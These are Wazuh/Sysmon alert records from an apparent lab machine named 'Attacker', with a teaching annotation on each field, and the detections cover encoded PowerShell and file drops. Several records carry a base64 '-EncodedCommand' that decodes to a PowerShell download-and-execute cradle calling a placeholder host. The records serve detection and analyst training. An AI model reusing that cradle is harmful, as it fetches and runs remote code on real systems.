data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 77 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534317.1661603 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:35.0202773Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284690 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:38:34.972
ProcessGuid: {94294ddc-bd69-680a-7b0b-000000000e00}
ProcessId: 7408
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_duu0a5qz.2gs.ps1
CreationUtcTime: 2025-04-24 22:38:34.972
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:34.972 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd69-680a-7b0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 7408 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_duu0a5qz.2gs.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:38:34.972 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534319.1664368 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:36.4053980Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43871 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4968 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534319.1671705 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:36.5651451Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43873 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4968 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 74 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534320.1679042 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:38.2272668Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284720 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:38:36.142
ProcessGuid: {94294ddc-bd6c-680a-7e0b-000000000e00}
ProcessId: 14508
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd69-680a-7b0b-000000000e00}
ParentProcessId: 7408
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:36.142 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd6c-680a-7e0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 14508 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd69-680a-7b0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 7408 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 78 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534320.1687109 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:38.4764370Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284721 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:38:38.465
ProcessGuid: {94294ddc-bd6c-680a-7e0b-000000000e00}
ProcessId: 14508
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_qxtyh4i4.l1m.ps1
CreationUtcTime: 2025-04-24 22:38:38.465
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:38.465 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd6c-680a-7e0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 14508 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_qxtyh4i4.l1m.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:38:38.465 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 75 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
